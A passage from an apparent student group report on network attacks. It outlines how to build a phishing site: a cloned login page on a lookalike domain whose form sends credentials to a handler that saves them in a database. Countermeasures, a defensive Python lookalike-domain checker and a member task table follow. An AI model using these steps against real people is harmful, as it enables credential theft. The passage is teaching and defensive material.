- Install antivirus, anti-spyware and anti-trojan software, and a firewall, when browsing the web.
- Regularly update patches for the operating system and for the protective programs.

II. Using a Phishing Website

1. How it is carried out

Build a fake web page that looks like the login page of the site whose accounts you want. Then find a domain name that resembles the target site's, for example yahooo.com or gmail.server.com. Edit some of the code in the login page, upload it to some web server, and point the domain name at that server. Send the link to the victim, or trick the victim into opening the fake link some other way.

Steps

Step 1: Edit the login page so that the form's action points to the page xuly.php.

Step 2: Create the page xuly.php (the handler that receives the submitted fields).

Step 3: Create the file connect.php as shown, where $hostname is the domain name of the web server.

Step 4: Create a database named yahoo with one table, password, that has two columns: Passwd and User.

Step 5: Upload to the web server and test.

Result: (screenshot)

2. Context and what is achieved

Spoofing the login page only works when the victim opens the fake page we have prepared, which is difficult if the victim pays attention to the web site's domain name. A fake website lets us obtain the victim's credentials, with which the accounts can be accessed; this is very dangerous if it is a bank account.

3. Remarks and countermeasures

Building a fake website is very easy, and at the same time very easy to spot. Simply paying attention when logging in avoids losing an account: check the domain name in the address bar, not the look of the page. Also install antivirus and do not click strange links, to avoid being infected with a keylogger.
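The "pay attention when logging in" advice above, as an added check in Python (not the report's code): given the URL a login form is about to be sent to, flag the two patterns the section names, a typo of a trusted domain (yahooo.com) and a trusted brand used as a subdomain of someone else's domain (gmail.server.com). The allowlist is constructed for the example, and registrable_domain uses a two-label simplification that a real implementation would replace with the public suffix list.

```python
from urllib.parse import urlsplit

# Constructed allowlist of the brands the report's phishing examples imitate.
TRUSTED_DOMAINS = {"yahoo.com", "gmail.com", "facebook.com", "google.com"}


def registrable_domain(host):
    """Last two labels (simplification: ignores multi-part suffixes such as .com.vn)."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Levenshtein distance, used to catch one- or two-character typo domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_login_url(url, trusted=TRUSTED_DOMAINS):
    """Return (verdict, reason) for the host a login form is about to be sent to."""
    host = (urlsplit(url).hostname or "").lower()
    if not host:
        return "invalid", "no host in URL"
    if not host.isascii():
        return "lookalike", "non-ASCII characters in host name"
    domain = registrable_domain(host)
    if domain in trusted:
        return "trusted", f"{domain} is on the allowlist"
    labels = set(host.split("."))
    for brand in trusted:
        brand_name = brand.split(".")[0]
        # gmail.server.com: the brand appears as a label under someone else's domain
        if brand_name in labels or brand in host:
            return "lookalike", f"brand '{brand_name}' used inside {domain}"
        # yahooo.com: a near-miss spelling of a trusted registrable domain
        if edit_distance(domain.split(".")[0], brand_name) <= 2:
            return "lookalike", f"{domain} is within 2 edits of {brand}"
    return "unknown", f"{domain} is not on the allowlist"
```

The check deliberately looks only at the host the form posts to; the page's appearance, which is what the victim judges by, is the one thing the attacker copies perfectly.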

D. GROUP MEMBERS AND DIVISION OF WORK

Full name             Student ID    Email address        Task
Nguyễn Mạnh Lâm       K094061155    [email protected]    Stealing cookies, hijacking sessions
Lê Thị Kiều Oanh      K094061173    [email protected]    Sniffing passwords with Wireshark
Lê Thị Thu            K094061188    [email protected]    Keylogger; phishing website
Nguyễn Thị Thúy       K094061190    [email protected]    SSL strip
Đỗ Thị Thanh Trang    K094061202    [email protected]    DNS spoofing

END